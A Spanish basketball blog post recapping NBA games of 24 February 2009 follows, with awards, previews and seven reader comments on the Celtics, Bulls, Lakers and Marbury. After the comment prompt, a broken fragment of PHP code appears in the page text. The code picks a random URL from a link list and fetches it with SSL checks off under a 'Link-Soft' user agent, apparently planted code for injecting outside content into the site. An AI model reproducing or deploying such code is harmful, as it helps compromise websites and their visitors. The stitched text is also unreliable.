La crónica (24/02/2009)

25 de February de 2009 por MagicJohnson32

Por TheDeerHunter y MagicJohnson32

La jornada de anoche nos dejó ocho buenos partidos y, por fin, la resolución del caso Marbury. Los Celtics han firmado a Mikki Moore y ahora ponen sus ojos en el antiguo compañero de KG. Sin duda, dos buenas incorporaciones que redondean una plantilla de campeones. El equipo a batir.

Lakers y Cavs, por su parte, no mostraron la mejor de sus caras contra Thunder y Grizzlies respectivamente. Los angelinos, con ciertos signos de desgaste, tuvieron que echar mano del Kobe más determinante en los últimos minutos para llevarse un partido que parecían tener controlado pero que se complicó en el tramo final contra un rival, a priori, bastante fácil. En Cleveland los locales se dedicaron a nadar y guardar la ropa sin excesivo entusiasmo. Una defensa correcta fue suficiente para anular a los Grizzlies durante la primera parte. Luego se limitaron a controlar el partido y punto.

Además se jugaron interesantes choques en la parte alta. Destacábamos ayer el Dallas @ San Antonio, pero lo cierto es que fue bastante decepcionante. Sin Duncan, con sobrecarga, ni Ginóbili, los Spurs les dieron una lección en toda regla a sus huéspedes con una defensa de libro que tampoco fueron capaces de poner a prueba los Mavs y un Parker dando buena cuenta de un Kidd superado. Malos tiempos para la lírica. Lejos quedan ya los duelos que han convertido en clásico este enfrentamiento. El tiempo pasa inexorable, excepto para Popovic y los suyos.

También señalábamos a Diaw como jugador a seguir en su vuelta a Phoenix. Él no decepcionó y se dejó la piel contra su ex-equipo. No pudo ser pero nadie podrá decir que tuvo la culpa. Nash estaba siendo el mejor del encuentro hasta que se lesionó un tobillo. Le ha sentado bien el cambio de entrenador, pero a los Suns parece que les ha mirado un tuerto.

Los Blazers pelearon por remontar en Houston un partido que perdieron en la primera parte. Tocaba esfuerzo extra y eso supone que Roy va a jugar hasta reventar. Sergio y Rudy no rascaron nada. Teniendo al bueno de Roy ya no hace falta más gente en el equipo. Con todo, anoche no fue suficiente contra los Rockets en su casa.

Siguiendo con los españoles, Calderón hizo fluir a su equipo como sólo él sabe hacer. El rival, Minnesota, no es que fuera de alto standing, pero es que los Raptors tampoco andan demasiado sobrados.

Por último, dos interesantísimos choques en el Este. Wade recibió a Detroit con el cuchillo entre los dientes. Imparable. No sólo los acribilló sino que, además, fue capaz de involucrar en todo momento a sus compañeros. Será casualidad, pero parecería que su intención era darle una lección a A.I. de cómo debería haber jugado toda la vida.

Y en Chicago, los nuevos Bulls le dieron un repasito a los Magic. Menuda pinta tienen los rojos ahora mismo.

PREMIOS

MVP: Kobe, con 15 puntos en los 7:30 de 4º cuarto que jugó (para un total de 36), y Wade, que anotó 31 y logró su mejor marca de asistencias con las 16 que repartió ante los Pistons, no logran desbancar a Tony Parker, que anotó 37 puntos, repartió 12 asistencias, cogió 5 rebotes y lideró a los Spurs sin Duncan ni Ginóbili a un contundente triunfo ante los Mavs.

El rookie: Derrick Rose lideró el importante triunfo de los Bulls ante Orlando con 22 puntos, 5 asistencias y 3 rebotes.

La sorpresa: Kurt Thomas demostró que es un parche de lujo y sustituyó a Duncan con 10 puntos, 15 rebotes y 3 tapones.

La decepción: Lo venimos avisando, ojo que los Pistons pueden pasar problemas para meterse en Playoffs. Ya son siete las derrotas seguidas, la de anoche con paupérrimas actuaciones de Rasheed, Hamilton y Stuckey, y los próximos cuatro partidos de los de Michigan son contra Hornets, Magic y Celtics, todos lejos de Auburn Hills.

El mayor esfuerzo en vano: Los dos ex Suns de los Bobcats dieron lo mejor de sí en su primera visita a Phoenix. Diaw hizo un partido prácticamente perfecto con 10 de 12 en tiros de campo para 27 puntos, 10 rebotes, 6 asistencias y 2 tapones, mientras que Raja Bell anotó 9 de sus 15 tiros para 23 puntos, con 3 rebotes y 3 asistencias. Los Suns, sin embargo, fueron demasiado.

RAZONES PARA TRASNOCHAR
Once encuentros se jugarán esta próxima madrugada. Destacamos, como cada día, un partido y un jugador:

Pistons @ Hornets. Crisis. Los Pistons llegan a New Orleans con serios problemas, mal juego y peores resultados, tanto que ya presentan balance negativo. Los Hornets también han tenido una buena ración de problemas durante la temporada pero, por el contrario, pueden mirar con optimismo el futuro inmediato después de que el traspaso de Chandler a los Thunder se viese frustrado. A partir de las 2:00 (hora peninsular) veremos si Michael Curry recupera algo del crédito perdido.

Baron Davis. Ante los Warriors vimos la versión buena de B-Diddy, una de la que todavía no habían podido disfrutar los aficionados de los Clippers. Pero la visita de Rondo y los Celtics le plantea un reto mucho más complicado. ¿Será capaz Baron de continuar con su aparente recuperación? Desde las 4:30 horas podremos comprobarlo.

Comenta

7 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Pues yo sigo a lo mio, los Bulls tienen ahora mismo quizá el mejor banquillo del Este y no se si de la liga. Una segunda unidad con Hinrich-Salmons-Miller pueden mantener a flote cualquier partido y ser un punto fuerte para los de la ciudad del viento. Como Rose se muestre mas regular creo que van a ser jueces de lo que pase en la liga.

    Y los Lakers necesitan algun refuerzo para no tener que ver cada noche estas minutadas para Pau y Odom.

      Citar

  2. MagicJohnson32 dice:
    #2

    La verdad es que a los Bulls les ha quedado una plantilla interesante, con 9 jugadores de garantías. Me sigue pareciendo que les falta un líder, algo que posiblemente sea Rose en el futuro pero que todavía no es.

    Y los Lakers… no se van a reforzar. Vamos, me sorprendería muchísimo. Se traspasó a Radman por motivos económicos y a Mihm por lo mismo. Puede que cueste de creer, pero la crisis afecta a todos. Que ojalá fichen a alguien. Quién sabe, tal vez estén esperando a ver qué jugadores quedan libres (se habla que Joe Smith y Gooden pueden ser cortados), pero no lo creo ni se rumorea nada.

    Ah, el cachondo de Bryon Russell, con sus casi 40 añazos, dice que quiere fichar por los Celtics para hacer el papel de James Posey. Sí, ya, claro.

    Por cierto, ¿pensáis que Marbury ayudaría a los Celtics?

      Citar

  3. TheDeerHunter dice:
    #3

    Pues habrá que ver en qué condiciones vuelve, tras todo este mogollón de tiempo sin jugar… pero la traca sería que pretendiera quitarle el puesto de titular a Rondo… sería muy fuerte y ni siquiera de Marbury me creo que fuera tan descerebrado.

    En condiciones normales, por el mínimo claro que es un jugador interesante… y no debe de habérsele olvidado jugar a esto, digo yo.

    Lo de Bryon Russell, no lo veo, no…

      Citar

  4. Txusma dice:
    #4

    Lei lo de Russell y me perdi contando los años que podria tener este hombre… 😀
    Creo q voy a ofrecerme yo tb para hacer el papel de… agita toallas, mismamente.

      Citar

  5. UnderlocK dice:
    #5

    Bueno aunque ya llevo bastante tiempo que os leo y algo menos comentando, felicitaros por el blog.

    Y respecto a la jornada, me alegro por Miami que sin hacer ruido y si no se duermen van a conseguir ser quintos del Este, con un Wade colosal y una base de jugadores jóvenes que promete mucho. Ayer estuve viendo el partido y el traspaso con los Raptors tiene pinta de robo, ya que O’Neal se ha adaptado como un puzzle y Moon esta dando un gran rendimiento.

    Y sobre lo de Marbury y siendo bastante negativo, aunque puedo confundirme, se equivocan los Celtics. Un jugador bastante problematico y que no se sabe como reaccionaria a su nuevo rol en el equipo, yo no lo fichaba desde luego. Ademas en esa posicion creo que estan bien cubiertos, aunque House sea mas escolta que base, cumple perfectamente en esa posicion.

      Citar

  6. javi dice:
    #6

    Como esta el este!!!, parece que cualquiera que encadene una buena racha se mete en playoff, otra cosa es el papel que luego hagan.

    Lo de los pistons cada día me tiene más mosqueado, como no se pongan las pilas…..Lo último que he leído esk sheed , mcdyes y hamilton había llevado a su redil al bueno de stucky, parece que A.I se keda solo en el vestuario, huele a guerra de gallitos.

    Y lo de los refuerzos, como celtics tb se hagan con starbury mala cosa para el resto. Me parece bastante raro lo de los lakers, 0 refuerzos y parece que no van a hacerlos. Odom no se, pro Pau llegará fundydo a PO y eso lo van a notar mucho

      Citar

  7. Jabho dice:
    #7

    bueno, creo que era esperable que los Celtics se reforzaran con dos jugadores veteranos. Cassell no está para jugar y llegar a PO con Powe y Davis como únicos relevos interiores era jugártela a una lesión no ya de una estrella sino del mismo Perkins como ocurrió en las finales pasadas.

    Mikki Moore es una buena opción, muy buena, para los C´s. Hubiera preferido a PJ, pero supongo que no estará en condiciones ni motivado. Pero su papel en las finales o en el 7º contra los Cavs fue clave totalmente. Creo que Moore no llegará al nivel de PJ pero es una gran incorporación.

    Lo de Marbury es más difícil. Si viene medio bien, sin ego, dispuesto a defender y con un rol de liderar la 2ª unidad puede ser la clave del anillo. Pero puede ser una bomba de relojería en el vestuario. La cosa es que hace falta algo por fuera … yo me arriesgaría porque supongo que querrá ganar un título, es amigo de KG y estará dispuesto a colaborar… Repetir está muy, muy difícil y un buen Marbury nos hace dar un paso grande. Vale que el tío no valga para ser la piedra angular de un equipo, pero si quiere para jugar 20-25 minutos y ayudar digo yo que si valdrá.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>